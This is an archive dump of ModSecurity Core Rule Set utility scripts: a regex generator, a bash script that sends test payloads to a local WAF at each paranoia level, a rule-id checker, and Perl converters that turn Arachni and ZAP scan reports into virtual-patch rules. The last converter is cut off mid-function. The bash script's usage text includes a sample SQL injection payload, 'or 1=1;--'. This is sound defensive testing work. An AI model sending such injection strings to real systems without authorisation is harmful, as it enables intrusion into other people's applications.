�����������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-tricks/�����������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020423�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-tricks/negative-lookahead.py��������������������������������������0000664�0000000�0000000�00000006417�14461225151�0024534�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������import argparse # WARNING: This script is EXPERIMENTAL. Use with caution. # # Known issues: # * At the moment, it will probably not work with more than two strings. # # Known limitations: # * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, # make sure that subtrings of the negative lookahead are not harmful in any way. 
parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ a regex that acts like a negative lookahead") parser.add_argument("strings", type=str, nargs='+', help="the strings to convert into a negative lookahead") parser.add_argument("--prefix", type=str, default="", help="sets a prefix for the resulting regex") parser.add_argument("--suffix", type=str, default="", help="sets a suffix for the resulting regex") args = parser.parse_args() # Return the longest prefix of all list elements. Shamelessly copied from: # https://stackoverflow.com/questions/6718196/determine-prefix-from-a-set-of-similar-strings def commonprefix(m): "Given a list of pathnames, returns the longest common leading component" if not m: return '' s1 = min(m) s2 = max(m) for i, c in enumerate(s1): if c != s2[i]: return s1[:i] return s1 # flatten returns a string with concatenated dictionary keys def flatten(dict): s = "" for key in dict.keys(): s += key return s # set returns a character set containing the unique characters across all strings for the given index def set(strings, index, flags): dict = {} for s in strings: # Continue so we don't panic if index > len(s) -1: continue dict[s[index]] = '' return "[" + flags + flatten(dict) + "]" # prepare converts a string for negative lookaheads emulation def prepare(s, offset): r = "" if len(s) == 0: return r for i in range(offset, len(s)): for j in range(0, i + 1): if j == i: r += "[^" + s[j] + "]" else: r += s[j] if i != len(s) - 1: r += "|" return r # run runs the def run(): strings = args.strings r = "" r += set(strings, 0, "^") c = "" d = {} # Only find common string if we have more than one if len(strings) > 1: c = commonprefix(strings) # Collect all characters after the common substring from every string for s in strings: if len(s) > len(c) and s.startswith(c): d[s[len(c)]] = '' # Add the common string to the regex to prevent accidental matching if len(c) > 0: if len(c) > 1: r += "|" + "(?:" + 
prepare(c, 1) + ")" r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" for s in strings: g = "" # When the common string is > 0, offset with len(c) + 1 because we handled this earlier if len(c) > 0: g = prepare(s, len(c) + 1) else: g = prepare(s, 1) # Add OR boolean if necessary if len(g) > 0: r += "|" r += g print(args.prefix + "(?:" + r + ")" + args.suffix) # Only run if script is called directly if __name__ == "__main__": run() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/send-payload-pls.sh������������������������������������������������������0000775�0000000�0000000�00000015675�14461225151�0021365�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/bash # # Script to post a payload against a local webserver at each paranoia level. # # Note: Webserver has to be prepared to take desired PL as Request Header "PL". # # WARNING: Setting the paranoia level using a header without proper # authentication and authorization is extremely dangerous, and is not # recommended for production. 
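#
# Check how to use the Christian Folini's Apache access log format at:
# https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/
#
# LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \
# \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \
# %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \
# %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \
# %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \
# %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended
#
# This script assumes %{ModSecAnomalyScoreIn}e is the second-to-last column in
# the access log; if this does not match your LogFormat the script won't work.
# For better results set the SecDefaultAction to 'pass'.
#
# The anomaly score envvar can be set as follows:
# SecAction "id:90101,phase:5,pass,nolog,\
# setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score}"
#
# Sample rule to setup the PL dynamically from localhost"
# SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \
# "id:90102,phase:1,pass,capture,log,auditlog,\
# msg:'Setting engine to PL%{matched_var}',chain"
# SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \
# "setvar:'tx.executing_paranoia_level=%{matched_var}'"
#
# The sample rule only honours the PL header from the listed source
# addresses; keep such a restriction in place on any server where this
# header is enabled.

# Path to CRS rule set and local files
CRS="/usr/share/modsecurity-crs/rules"
accesslog="/apache/logs/access.log"
errorlog="/apache/logs/error.log"
URL="localhost:40080"
protocol="http"

# Optional "--resolve host:port:addr" arguments for curl. Kept as an array so
# the user-supplied value reaches curl as a single word instead of being
# re-split by the shell.
resolve_args=()

# Numeric comparison: inside [[ ]] the ">" operator compares strings.
while [[ $# -gt 0 ]]
do
    case "$1" in
        -c|--crs)
            CRS="$2"
            shift
            ;;
        -a|--access)
            accesslog="$2"
            shift
            ;;
        -e|--error)
            errorlog="$2"
            shift
            ;;
        -u|--url)
            URL="$2"
            shift
            ;;
        -r|--resolve)
            resolve_args=(--resolve "$2")
            shift
            ;;
        --protocol)
            protocol="$2"
            shift
            ;;
        -P|--payload)
            PAYLOAD="$2"
            shift
            ;;
        -h|--help)
            echo "Usage:"
            echo " --crs \"/usr/share/modsecurity-crs/rules\""
            echo " --access \"/apache/logs/access.log\""
            echo " --error \"/apache/logs/error.log\""
            echo " --url \"localhost:40080\""
            echo " --resolve \"someservername:40080:localhost\""
            echo " --protocol \"https\""
            echo " --payload \"/tmp/payload\""
            echo " --help"
            exit 1
            ;;
    esac
    shift
done

echo "Using CRS: $CRS"
echo "Using accesslog: $accesslog"
echo "Using errorlog: $errorlog"
echo "Using URL: $URL"
echo "Using protocol: $protocol"

if [ -z "${PAYLOAD+x}" ]; then
    echo "Please submit valid payload file as parameter. This is fatal. Aborting."
    "$0" -h
    echo "Examples:"
    echo " ./send-payload-pls.sh -a /logs/test/access.log \
-e /logs/test/error.log -u test.test.test.com:6443 --protocol https \
--payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128"
    echo " ./send-payload-pls.sh -a /logs/test/access.log \
-e /logs/test/error.log -u test.test.test.com:6443 --protocol https \
--payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128"
    exit 1
fi

# Rules per Paranoia level
#
# rule_ids_between START_RE END_RE DELIMITER_RE
# Prints the ids of all rules found between the two delimiter patterns in the
# CRS rule files, joined with "\|" so the result can be used as an
# alternation in the basic-regex sed expressions further down. Lines matching
# DELIMITER_RE (the delimiter rules themselves) are left out.
rule_ids_between() {
    awk "/$1/,/$2/" "$CRS"/*.conf \
        | grep -E -v "$3" \
        | grep -E -o "id:[0-9]+" \
        | sed -r 's,id:([0-9]+),\1\\,' \
        | tr -t '\n' '\|' \
        | sed -r 's,\\\|$,,'
}

# Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1
# Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1
PL1=$(rule_ids_between "012,phase:2" "013,phase:1" "(012|013),phase")

# Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2
# Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2
PL2=$(rule_ids_between "014,phase:2" "015,phase:1" "(014|015),phase")

# Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3
# Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3
PL3=$(rule_ids_between "016,phase:2" "017,phase:1" "(016|017),phase")

# Paranoia level 4 rules, rule 018 is the delimiter of the start of PL4
# Paranoia level 4 rules, "Paranoia Levels Finished" delimiter of the end of PL4
PL4=$(rule_ids_between "018,phase:2" "Paranoia Levels Finished" "018,phase")

# An empty list would end up as an empty pattern in the sed expressions below.
for pl_name in PL1 PL2 PL3 PL4; do
    if [ -z "${!pl_name}" ]; then
        echo "Warning: no rule ids found for $pl_name under $CRS; rule tagging will not work." >&2
    fi
done

echo "Sending the following payload at multiple paranoia levels: $PAYLOAD"
echo

for PL in 1 2 3 4; do
    echo "--- Paranoia Level $PL ---"
    echo

    # -k turns off TLS certificate verification. That is acceptable for the
    # local test server this script is written for; do not reuse the call
    # against hosts whose identity matters.
    if [ -f "$PAYLOAD" ]; then
        curl "$protocol://$URL" "${resolve_args[@]}" -k --data-binary "@$PAYLOAD" -H "PL: $PL" -o /dev/null -s
    else
        curl "$protocol://$URL" "${resolve_args[@]}" -k -d "$PAYLOAD" -H "PL: $PL" -o /dev/null -s
    fi

    # Here are three ways to get the transaction unique id,
    # the first one is Christian's format, second is Spartan's format,
    # and the third one tries to guess which is the unique id using a
    # regular expression, the first two require specific format.
    # The automatic format detection may cause the script to malfunction.
    # Uncomment only the required format.

    # To use Christian's accesslog format uncomment the following line
    uniq_id=$(tail -1 "$accesslog" | cut -d\" -f11 | cut -b2-26)

    # To use Spartan's accesslog format (21 col) uncomment the following line
    #uniq_id=$(tail -1 "$accesslog" | awk '{print $21}')

    # To use the automatic unique_id detection uncomment the following line
    #uniq_id=$(tail -1 "$accesslog" | grep -E -o '[a-zA-Z0-9]{26,28}')

    echo "Tracking unique id: $uniq_id"

    if [ -z "$uniq_id" ]; then
        # Unquoted, an empty id made grep take the error log path as its
        # pattern and wait on stdin; quoted, it would match every line.
        echo "No unique id found in the last line of $accesslog; skipping error log lookup." >&2
    else
        # -F and "--": the id is data taken from a log line, so it is matched
        # literally and can never be read as a grep option.
        grep -F -- "$uniq_id" "$errorlog" \
            | sed -e "s/.*\[id \"//" -e "s/\(......\).*\[msg \"/\1 /" -e "s/\"\].*//" -e "s/(Total .*/(Total ...) .../" -e "s/Incoming and Outgoing Score: [0-9]* [0-9]*/Incoming and Outgoing Score: .../" \
            | sed -e "s/$PL1/& PL1/" -e "s/$PL2/& PL2/" -e "s/$PL3/& PL3/ " -e "s/$PL4/& PL4/" \
            | sort -k2 \
            | sed -r "s/^([0-9]+)$/\1 FOREIGN RULE NOT IN CRS/"
    fi

    echo
    echo -n "Total Incoming Score: "

    # Here are two ways to get the transaction anomaly score,
    # the first one is Christian's format, second is Spartan's format

    # To use Christian's accesslog format uncomment the following line
    tail -1 "$accesslog" | cut -d\" -f11 | cut -d' ' -f14 | tr "-" "0"

    # To use Spartan's accesslog format (21 col) uncomment the following line
    # To use a different column change the $NF value, e.g. $(NF-1)
    #tail -1 "$accesslog" | awk '{print $NF}' | tr "-" "0"

    echo
done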
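#!/usr/bin/env ruby
# -*- coding: utf-8 -*-
#
# Copyright © 2012 Diego Elio Pettenò
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS
# ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE
# CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
# DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
# PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.

# Checks the rule ids of every SecRule / SecAction in the *.conf files below
# the parent directory: each non-chained rule needs exactly one id, inside
# the reserved range and not used before; chained rules must not carry one.
# Problems are written to stderr and make the script exit with status 1.

require 'set'

seen_ids = Set.new
res = 0

# read reserved id range from the id-range file so that it can be
# configured on a per-repository basis.
range = Range.new(*File.read('id-range').rstrip.split('-').map(&:to_i))

# open all the rule files
Dir.chdir("../")
Dir["**/*.conf"].each do |rulefile|
  # read the content
  content = File.read(rulefile)

  lineno = 0

  # this_chained: the current directive continues a chain started by the
  # previous one; next_chained: the current directive itself has "chain".
  this_chained = next_chained = false
  prevline = nil

  # for each line in the rule file
  content.each_line do |line|
    lineno += 1

    # handle continuation lines
    line = (prevline + line) unless prevline.nil?

    # remove comments
    line.gsub!(/^([^'"]|'[^']+'|"[^"]+")#.*/) { $1 }

    # a trailing backslash means the directive goes on in the next line
    if line =~ /\\\n$/
      prevline = line.gsub(/\\\n/, '')
      next
    else
      prevline = nil
    end

    # skip if it's an empty line (this also skips comment-only lines)
    next if line =~ /(?:^\s+$|^#)/

    this_chained = next_chained
    next_chained = false

    # split the directive in its components, considering quoted strings
    directive = line.scan(/([^'"\s][^\s]*[^'"\s]|'(?:[^']|\\')*[^\\]'|"(?:[^"]|\\")*[^\\]")(?:\s+|$)/).flatten

    directive.map! do |piece|
      # then make sure to split the quoting out of the quoted strings
      (piece[0] == '"' || piece[0] == "'") ? piece[1..-2] : piece
    end

    # skip if it's not a SecRule or SecAction
    case directive[0]
    when "SecRule"
      rawrule = directive[3]
    when "SecAction"
      rawrule = directive[1]
    else
      next
    end

    # get the rule and split in its components
    rule = (rawrule || "").gsub(/(?:^"|"$)/, '').split(/\s*,\s*/)

    next_chained = true if rule.include?("chain")

    ids = rule.find_all { |piece| piece =~ /^id:/ }
    if ids.size > 1
      $stderr.puts "#{rulefile}:#{lineno} rule with multiple ids"
      # Fail the run like every other finding does; before, this case was
      # reported but left the exit status at 0.
      res = 1
      next
    elsif ids.empty?
      id = nil
    else
      id = ids[0].sub(/^id:/, '').gsub(/(?:^'|'$)/, '').to_i
    end

    if this_chained
      unless id.nil?
        $stderr.puts "#{rulefile}:#{lineno} chained rule with id"
        res = 1
      end

      next
    elsif id.nil?
      $stderr.puts "#{rulefile}:#{lineno} rule missing id (#{rule.join(',')})"
      res = 1
      next
    elsif ! range.include?(id)
      $stderr.puts "#{rulefile}:#{lineno} rule with id #{id} outside of reserved range #{range}"
      res = 1
    elsif seen_ids.include?(id)
      $stderr.puts "#{rulefile}:#{lineno} rule with duplicated id #{id}"
      res = 1
    end

    seen_ids << id
  end
end

exit res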
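#!/opt/local/bin/perl -T

#############################################
# -=[ Virtual Patching Converter Script ]=- #
#        Converts arachni XML Output        #
#    https://github.com/Zapotek/arachni     #
#                                           #
#             arachni2modsec.pl             #
#               Version: 1.0                #
#                                           #
#              Copyright 2011               #
#   Trustwave's SpiderLabs Research Team    #
#             www.trustwave.com             #
#                                           #
#   Based On Code Originally Created by:    #
#              The Denim Group              #
#            www.denimgroup.com             #
#############################################

use XML::Smart;
use Switch;
use Data::Types qw(:all);
use Data::Validate::URI qw(is_uri);
use Getopt::Std;
use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later

# Reads an arachni XML report (-f) and writes one chained ModSecurity rule
# per supported issue to $modsec_rules_file. URL and parameter names come
# from the report and are treated as untrusted: they are validated and
# regex-escaped before they are placed into a rule (see rule_safe).
#
# NOTE(review): Switch and Acme::Comment are loaded above and, as far as can
# be told from here, rewrite this source before it runs; two adjacent forward
# slashes or a C-style comment opener are therefore kept out of code and
# string literals in this file.

#############
# Variables #
#############

# [Configuration Vars]

my %param;
getopt("f",\%param);
my $filename = $param{f};
my $all_vulnerabilities_filename = "$filename";

unless ($filename) {
    print "Flag:\n\n\t -f:\t path to arachni xml report file\nUsage:\n\n\t./arachni2modsec.pl -f ./arachni_report.xml\n\n";
    exit;
}

# Written to the current directory and truncated on every run.
my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";

# [End Config Vars]

my $VULN_CLASS_XSS = "Cross-Site Scripting (XSS)";
my $VULN_CLASS_SQLI = "SQL Injection";
my $VULN_CLASS_BLIND_SQLI = "Blind SQL Injection";
my $VULN_CLASS_LFI = "Path Traversal";
my $VULN_CLASS_RFI = "Remote file inclusion";
my $VULN_CLASS_HTTPRS = "Response splitting";

# Only the vulnerabilities in this array will have
# rules generated for them.
my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_BLIND_SQLI, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS);
my %is_supported = map { $_ => 1 } @supported_vulns;

my $num_rules_generated=0;
my $num_not_supported=0;
my $num_bad_urls=0;

my $all_vulns_xml;
my @type;
my @url;
my @param;
my $vuln_count;

# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#############
# Main      #
#############

# Drop the environment variables that must not be inherited when the
# script runs in taint mode (-T).
delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)};

$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename);

# Parallel lists: entry N of each belongs to issue N of the report.
@type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name');
@url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url');
@param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable');

open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file";
$MODSEC_RULES->autoflush(1);

$vuln_count = 0;
foreach my $current_type (@type){
    print "==================================================================================================\n";
    print "Vulnerability[$vuln_count] - Type: $current_type\n";
    if(exists $is_supported{$current_type}){
        parseData(to_string($current_type));
    }else {
        # The message used to interpolate an unset scalar and printed no type.
        print "Vulnerability Type: $current_type is not supported in this version.\n";
        $num_not_supported++;
    }
    $vuln_count++;
}
close($MODSEC_RULES);

print "==================================================================================================\n";
print "\n\n************ END OF SCRIPT RESULTS *****************\n";
print "Number of Vulnerabilities Processed: $vuln_count\n";
print "Number of ModSecurity rules generated: $num_rules_generated\n";
print "Number of Unsupported vulns skipped: $num_not_supported\n";
print "Number of bad URLs (rules not gen): $num_bad_urls\n";
print "****************************************************\n\n";
print "----------------------------------------------------\n";
print "To activate the virtual patching file ($modsec_rules_file),\n";
print "copy it into the CRS \"base_rules\" directory and then create\n";
print "a symlink to it in the \"activated_rules\" directory.\n";
print "-----------------------------------------------------\n\n";

###############
# Subroutines #
###############

# Validates the URL of the current issue ($vuln_count) and, when it is
# well-formed, hands the issue type, URL path and parameter to
# generate_patch.
sub parseData {
    my($vuln_str) = @_;
    my $current_vuln_url = $url[$vuln_count];

    print "Found a $vuln_str vulnerability.\n";

    # Validate url (need separate sub?)
    print "Validating URL: $current_vuln_url\n";
    if(is_uri(to_string($current_vuln_url))){
        print "URL is well-formed\n";
        print "Continuing Rule Generation\n";
    } else {
        print "URL is NOT well-formed. Breaking Out of Rule Generation\n";
        $num_bad_urls++;
        return;
    }

    my $current_uricontent = get_uricontent($current_vuln_url);
    my @current_params = $param[$vuln_count];
    print "Current vulnerable Param(s): @current_params\n";

    generate_patch($vuln_str,$current_uricontent,@current_params);
}

# Returns $value escaped for use as a literal inside a rule regex, or nothing
# when it holds a character that could end the quoted rule argument or the
# line: control characters, space, both quote characters and the backslash.
sub rule_safe {
    my($value) = @_;
    my $text = "$value";
    my $unsafe = '[\x00-\x20\x7f\x22\x27\x5c]';
    if($text =~ /$unsafe/){
        return;
    }
    return quotemeta($text);
}

# Writes one chained rule per parameter to the rules file.
#   $type     issue type, used in msg and in the console output
#   $id       rule id
#   $uri      URL path as returned by get_uricontent
#   $params   array reference with the vulnerable parameter names
#   $tx_class class name matched in the TX collection (e.g. XSS)
#   $tags     tag actions of the first rule
#   $setvars  setvar actions of the chained rule
sub write_rules {
    my($type,$id,$uri,$params,$tx_class,$tags,$setvars) = @_;

    unless($uri ne "" && @{$params}){
        return;
    }

    my $safe_uri = rule_safe($uri);
    unless(defined $safe_uri){
        print "URL path contains characters that are not safe inside a rule. No rule generated.\n";
        return;
    }

    foreach my $raw (@{$params}){
        my $param_name = "$raw";
        if($param_name eq ""){
            next;
        }
        my $safe_param = rule_safe($param_name);
        unless(defined $safe_param){
            print "Parameter name contains characters that are not safe inside a rule. No rule generated.\n";
            next;
        }

        my $rule = "SecRule REQUEST_FILENAME \"${safe_uri}\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for ${type}',id:'${id}',${tags},logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/${tx_class}.*ARGS:${safe_param}\/\' \"\@gt 0\" \"${setvars}\"";
        print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uri\n# Vulnerable Parameter: $param_name\n#\n".$rule."\n\n";
        # Report the type that was actually handled; several branches used
        # to print the name of a different class here.
        print "$type (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
        $num_rules_generated++;
    }
}

# Picks tags, TX class and score variables for the issue type and writes the
# rule(s) through write_rules.
sub generate_patch {
    my($type,$uricontent,@params) = @_;
    # NOTE(review): the id is "1" followed by the issue index, so generated
    # ids are small numbers; check them against ids already in use.
    my $id = "1".$vuln_count;
    my $score = "setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}";
    my $sqli_tags = "tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2'";
    my $sqli_score = "setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},".$score;

    switch($type) {
        case ($VULN_CLASS_XSS) {
            write_rules($type,$id,$uricontent,\@params,"XSS",
                "tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1'",
                "setvar:tx.xss_score=+%{tx.critical_anomaly_score},".$score);
        }
        case ($VULN_CLASS_SQLI) {
            write_rules($type,$id,$uricontent,\@params,"SQL_INJECTION",$sqli_tags,$sqli_score);
        }
        case ($VULN_CLASS_BLIND_SQLI) {
            write_rules($type,$id,$uricontent,\@params,"SQL_INJECTION",$sqli_tags,$sqli_score);
        }
        case ($VULN_CLASS_LFI) {
            write_rules($type,$id,$uricontent,\@params,"LFI",
                "tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33'",$score);
        }
        case ($VULN_CLASS_RFI) {
            write_rules($type,$id,$uricontent,\@params,"RFI",
                "tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05'",$score);
        }
        case ($VULN_CLASS_HTTPRS) {
            write_rules($type,$id,$uricontent,\@params,"RESPONSE_SPLITTING",
                "tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25'",$score);
        }
    }
}

# Returns the path part of $url: scheme and host are cut off the front and
# everything from the first question mark on is dropped.
sub get_uricontent {
    my($url) = @_;
    # http and https; with http only, an https URL stayed whole and the
    # generated REQUEST_FILENAME pattern could never match a request.
    my $regex = "https?:\/\/+[a-zA-Z0-9.:-]*\/";

    # First, trim the scheme and host part out of the URL. $& is only valid
    # after a successful match, so it is read inside the if.
    if($url =~ /$regex/){
        substr($url,index($url,$&),length($&)) = "";
    }

    # If the URL contains a php or cgi query with
    # one or more params and values, trim those out.
    # Trim from the question mark to the end.
    if($url =~ /\?/){
        substr($url,index($url,"?")) = "";
    }
    return $url;
}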
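#!/opt/local/bin/perl -T

#############################################
# -=[ Virtual Patching Converter Script ]=- #
#       Converts OWASP ZAP XML Output       #
#    https://code.google.com/p/zaproxy/     #
#                                           #
#               zap2modsec.pl               #
#               Version: 1.0                #
#                                           #
#              Copyright 2011               #
#   Trustwave's SpiderLabs Research Team    #
#             www.trustwave.com             #
#                                           #
#   Based On Code Originally Created by:    #
#              The Denim Group              #
#            www.denimgroup.com             #
#############################################

use XML::Smart;
use Switch;
use Data::Types qw(:all);
use Data::Validate::URI qw(is_uri);
use Getopt::Std;
use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later

# Reads an OWASP ZAP XML report (-f) and writes one chained ModSecurity rule
# per supported alert to $modsec_rules_file. URL and parameter names come
# from the report and are treated as untrusted: they are validated and
# regex-escaped before they are placed into a rule (see rule_safe).
#
# NOTE(review): Switch and Acme::Comment are loaded above and, as far as can
# be told from here, rewrite this source before it runs; two adjacent forward
# slashes or a C-style comment opener are therefore kept out of code and
# string literals in this file.

#############
# Variables #
#############

# [Configuration Vars]

my %param;
getopt("f",\%param);
my $filename = $param{f};
my $all_vulnerabilities_filename = "$filename";

unless ($filename) {
    print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n";
    exit;
}

# Written to the current directory and truncated on every run.
my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf";

# [End Config Vars]

my $VULN_CLASS_XSS = "Cross Site Scripting";
my $VULN_CLASS_SQLI = "SQL Injection";
my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting";
my $VULN_CLASS_LFI = "Path Traversal";
my $VULN_CLASS_RFI = "Remote File Inclusion";
my $VULN_CLASS_HTTPRS = "HTTP Response Splitting";

# Only the vulnerabilities in this array will have
# rules generated for them.
my @supported_vulns = ($VULN_CLASS_XSS, $VULN_CLASS_SQLI, $VULN_CLASS_SQLI_FINGERPRINT, $VULN_CLASS_LFI, $VULN_CLASS_RFI, $VULN_CLASS_HTTPRS);
my %is_supported = map { $_ => 1 } @supported_vulns;

my $num_rules_generated=0;
my $num_not_supported=0;
my $num_bad_urls=0;

my $all_vulns_xml;
my @type;
my @url;
my @param;
my $vuln_count;

# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#############
# Main      #
#############

# Drop the environment variables that must not be inherited when the
# script runs in taint mode (-T).
delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)};

$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename);

# Parallel lists: entry N of each belongs to alert N of the report.
@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert');
@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri');
@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param');

open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file";
$MODSEC_RULES->autoflush(1);

$vuln_count = 0;
foreach my $current_type (@type){
    print "==================================================================================================\n";
    print "Vulnerability[$vuln_count] - Type: $current_type\n";
    if(exists $is_supported{$current_type}){
        parseData(to_string($current_type));
    }else {
        # The message used to interpolate an unset scalar and printed no type.
        print "Vulnerability Type: $current_type is not supported in this version.\n";
        $num_not_supported++;
    }
    $vuln_count++;
}
close($MODSEC_RULES);

print "==================================================================================================\n";
print "\n\n************ END OF SCRIPT RESULTS *****************\n";
print "Number of Vulnerabilities Processed: $vuln_count\n";
print "Number of ModSecurity rules generated: $num_rules_generated\n";
print "Number of Unsupported vulns skipped: $num_not_supported\n";
print "Number of bad URLs (rules not gen): $num_bad_urls\n";
print "****************************************************\n\n";
print "----------------------------------------------------\n";
print "To activate the virtual patching file ($modsec_rules_file),\n";
print "copy it into the CRS \"base_rules\" directory and then create\n";
print "a symlink to it in the \"activated_rules\" directory.\n";
print "-----------------------------------------------------\n\n";

###############
# Subroutines #
###############

# Validates the URL of the current alert ($vuln_count) and, when it is
# well-formed, hands the alert type, URL path and parameter to
# generate_patch.
sub parseData {
    my($vuln_str) = @_;
    my $current_vuln_url = $url[$vuln_count];

    print "Found a $vuln_str vulnerability.\n";

    # Validate url (need separate sub?)
    print "Validating URL: $current_vuln_url\n";
    if(is_uri(to_string($current_vuln_url))){
        print "URL is well-formed\n";
        print "Continuing Rule Generation\n";
    } else {
        print "URL is NOT well-formed. Breaking Out of Rule Generation\n";
        $num_bad_urls++;
        return;
    }

    my $current_uricontent = get_uricontent($current_vuln_url);
    my @current_params = $param[$vuln_count];
    print "Current vulnerable Param(s): @current_params\n";

    generate_patch($vuln_str,$current_uricontent,@current_params);
}

# Returns $value escaped for use as a literal inside a rule regex, or nothing
# when it holds a character that could end the quoted rule argument or the
# line: control characters, space, both quote characters and the backslash.
sub rule_safe {
    my($value) = @_;
    my $text = "$value";
    my $unsafe = '[\x00-\x20\x7f\x22\x27\x5c]';
    if($text =~ /$unsafe/){
        return;
    }
    return quotemeta($text);
}

# Writes one chained rule per parameter to the rules file.
#   $type     alert type, used in msg and in the console output
#   $id       rule id
#   $uri      URL path as returned by get_uricontent
#   $params   array reference with the vulnerable parameter names
#   $tx_class class name matched in the TX collection (e.g. XSS)
#   $tags     tag actions of the first rule
#   $setvars  setvar actions of the chained rule
sub write_rules {
    my($type,$id,$uri,$params,$tx_class,$tags,$setvars) = @_;

    unless($uri ne "" && @{$params}){
        return;
    }

    my $safe_uri = rule_safe($uri);
    unless(defined $safe_uri){
        print "URL path contains characters that are not safe inside a rule. No rule generated.\n";
        return;
    }

    foreach my $raw (@{$params}){
        my $param_name = "$raw";
        if($param_name eq ""){
            next;
        }
        my $safe_param = rule_safe($param_name);
        unless(defined $safe_param){
            print "Parameter name contains characters that are not safe inside a rule. No rule generated.\n";
            next;
        }

        my $rule = "SecRule REQUEST_FILENAME \"${safe_uri}\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for ${type}',id:'${id}',${tags},logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/${tx_class}.*ARGS:${safe_param}\/\' \"\@gt 0\" \"${setvars}\"";
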